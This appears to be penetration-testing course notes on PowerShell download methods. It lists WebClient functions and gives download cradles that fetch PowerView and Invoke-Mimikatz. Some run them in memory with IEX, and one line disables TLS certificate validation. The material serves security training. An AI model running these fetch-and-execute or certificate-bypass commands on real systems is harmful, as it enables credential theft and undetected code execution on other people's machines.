Use the PowerShell class
- System.Net.WebClient
OpenRead Returns the data from a resource as a Stream
OpenReadAsync
- Returns the data from a resource without blocking the calling thread.
DownloadData
- Downloads data from a resource and returns a Byte array.
DownloadDataAsync
- Downloads data from a resource and returns a Byte array without blocking the calling thread.
DownloadFile
- Downloads data from a resource to a local file.
DownloadFileAsync Downloads data from a resource to a local file without blocking the calling thread.
DownloadString
- Downloads a String from a resource and returns a String.
DownloadStringAsync Downloads a String from a resource without blocking the calling thread.
Example
- (New-Object Net.WebClient).DownloadFile(’’,’')
InsertedExample
- (New-Object Net.WebClient).DownloadFileAsync(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', ‘C:\Users\Public\Downloads\PowerViewAsync.ps1’)
Download a string and run it directly with IEX in memory without saving it to the disk
Example: PS C:\htb> IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
IEX also allows pipeline Input
PS C:\htb> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX
Via Web-Request (PS > 3.0)
PS C:\htb> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
Good PowerShell list of Download cradles
Common Errors with PowerShell
InternetExplorer first-launch config has not been completed:
Bypassed by using the paramter: -UseBasicParsing
PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEXSSL/TLS channel cert. is not trusted
Bypassed with the command:
PS C:\htb> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}